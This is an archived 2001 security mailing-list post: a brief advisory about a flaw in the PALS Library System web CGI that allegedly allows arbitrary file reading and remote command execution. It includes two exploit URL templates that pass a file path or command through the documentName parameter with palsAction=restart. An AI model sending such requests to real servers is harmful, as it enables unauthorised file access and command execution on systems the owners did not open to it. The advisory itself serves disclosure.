OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: UkR-XblP™ (cuctemaOK.RU)
Date: Mon Feb 12 2001 - 08:17:46 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Name: PALS Library System "show files" Vulnerability and
    remote command executiom.
    Date: 02.02.2001
    About: This script is derived from an idea originated at
    St.Olaf College to provide a www interface to the PALS
    Library System. This idea was then worked on at Georgia
    State University. This version of WebPals has been written
    using their original ideal.
    Problem: Through this bug you can see any files and command
    execution. Problem lies in "pine pipe bug"
    Author: UkR-XblP
    Exploit:
    http://www.victim.com/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file
    http://www.victim.com/pals-cgi?palsAction=restart&documentName=url_to_command
    Get your free e-mail address at http://www.zmail.ru